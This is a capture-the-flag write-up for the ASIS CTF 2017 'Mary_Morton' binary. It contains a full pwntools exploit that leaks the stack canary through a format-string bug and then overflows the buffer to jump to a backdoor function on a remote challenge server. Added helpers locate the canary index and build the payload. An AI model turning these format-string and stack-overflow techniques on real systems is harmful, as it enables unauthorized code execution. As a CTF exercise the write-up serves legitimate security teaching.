
Mary_Morton

Author: 互联网

Challenge source: ASIS-CTF-Finals-2017

Challenge description: a very simple warm-up pwn

The binary is compiled with stack canary protection, so a plain overflow would just trigger __stack_chk_fail. The menu exposes two bugs, and they combine: option 2 has a format-string vulnerability, which we use to leak the canary (`%23$p` prints the 23rd positional printf argument, which on this binary is the canary; note its lowest byte is 0x00, as is normal for x86-64 glibc canaries); option 1 has a stack overflow, which we use to overwrite the return address with the backdoor function's address, writing the leaked canary back at its original offset (136 bytes into the buffer) so the check still passes, followed by a dummy saved rbp and then the return address. Because the canary contains a NUL byte, the payload has to be delivered with send() to a raw read(), not through a string-terminated input routine.

The exploit is as follows:

from pwn import *

#io = process('./pwn')
#io = gdb.debug('./pwn', 'b *0x40093F')
io = remote('111.200.241.244', 50734)
backdoor_addr = 0x4008DA          # address of the backdoor function in the binary

# Option 2: format-string bug. %23$p prints the 23rd positional argument,
# which is the stack canary of the vulnerable frame.
io.recvuntil(b'3. Exit the battle \n')
io.sendline(b'2')
sleep(1)
io.sendline('%23$p\n')
canary = int(io.recvline().strip(), 16)
info('canary: ' + hex(canary))

# Option 1: stack overflow. Layout: 136 bytes of buffer, then the canary,
# then the saved rbp, then the return address.
io.recvuntil(b'3. Exit the battle \n')
io.sendline(b'1')
payload = b'a' * 136 + p64(canary) + p64(0) + p64(backdoor_addr)
sleep(1)
io.send(payload)          # send(), not sendline(): the canary's low byte is 0x00

io.interactive()
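The script above hard-codes the two numbers that make this work (the `%23$p` index and the 136-byte distance to the canary). The helpers below, added here as an example and not part of the original writeup, show how a practitioner validates those numbers offline: picking the canary out of a `%p.%p.%p...` spray, sanity-checking the leaked value (x86-64 glibc canaries always have a zero low byte), and assembling the overflow payload without depending on pwntools. The spray output, leak line and canary values used in the test are constructed; the 136-byte offset and backdoor address 0x4008DA come from the exploit above.

```python
import struct

# Layout taken from the exploit above: 136 bytes of buffer, then the canary,
# then the saved rbp, then the return address.
BUF_TO_CANARY = 136
BACKDOOR_ADDR = 0x4008DA


def p64(value: int) -> bytes:
    """Little-endian 64-bit pack (what pwntools' p64 does), with no dependency."""
    return struct.pack("<Q", value)


def find_canary_candidates(spray_output: str, sep: str = ".") -> list:
    """Given the program's output for a '%p.%p.%p...' spray, return the 1-based
    %N$p indexes whose value looks like an x86-64 glibc stack canary:
    lowest byte 0x00 (so str* functions stop at it) and otherwise wide
    (not a small counter or a 32-bit value). Heuristic only; confirm the
    index in gdb before relying on it."""
    candidates = []
    for idx, word in enumerate(spray_output.strip().split(sep), start=1):
        if not word.startswith("0x"):
            continue  # "(nil)" or non-pointer output
        value = int(word, 16)
        if value > 0xFFFFFFFF and value & 0xFF == 0:
            candidates.append(idx)
    return candidates


def parse_canary(leak: str) -> int:
    """Parse the line the program prints back for '%23$p' and sanity-check it."""
    s = leak.strip()
    if not s.startswith("0x"):
        raise ValueError(f"unexpected leak {s!r}: is the %N$p index right?")
    canary = int(s, 16)
    if canary & 0xFF != 0:
        raise ValueError(f"{canary:#x} has a non-zero low byte; not a canary")
    return canary


def build_payload(canary: int, ret_addr: int = BACKDOOR_ADDR,
                  saved_rbp: int = 0, buf_to_canary: int = BUF_TO_CANARY) -> bytes:
    """Overflow payload: padding up to the canary, the leaked canary written
    back in place so __stack_chk_fail is not triggered, a dummy saved rbp,
    then the new return address. Must be delivered with send() to a raw
    read(): the canary's 0x00 byte would terminate a string-based read."""
    return (b"a" * buf_to_canary
            + p64(canary)
            + p64(saved_rbp)
            + p64(ret_addr))


if __name__ == "__main__":
    # Constructed spray output, as the program might print it for '%p.%p.%p...'.
    spray = "0x1.0x7ffd1234abcd.(nil).0x400a10.0x6a3b7f19c4e2d800.0x7ffd1234abf0"
    print("canary candidates (%N$p indexes):", find_canary_candidates(spray))
    canary = parse_canary("0x6a3b7f19c4e2d800\n")  # constructed leak line
    payload = build_payload(canary)
    print(len(payload), "bytes:", payload.hex())
```

Usage: run a spray once against a local copy to locate the index, then replace the hard-coded `%23$p` with the index found; `build_payload` is a drop-in for the `payload = ...` line in the exploit.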


Tags: p64, canary, sendline, io, pwn, Exit, Morton, Mary
Source: https://www.cnblogs.com/hktk1643/p/15143999.html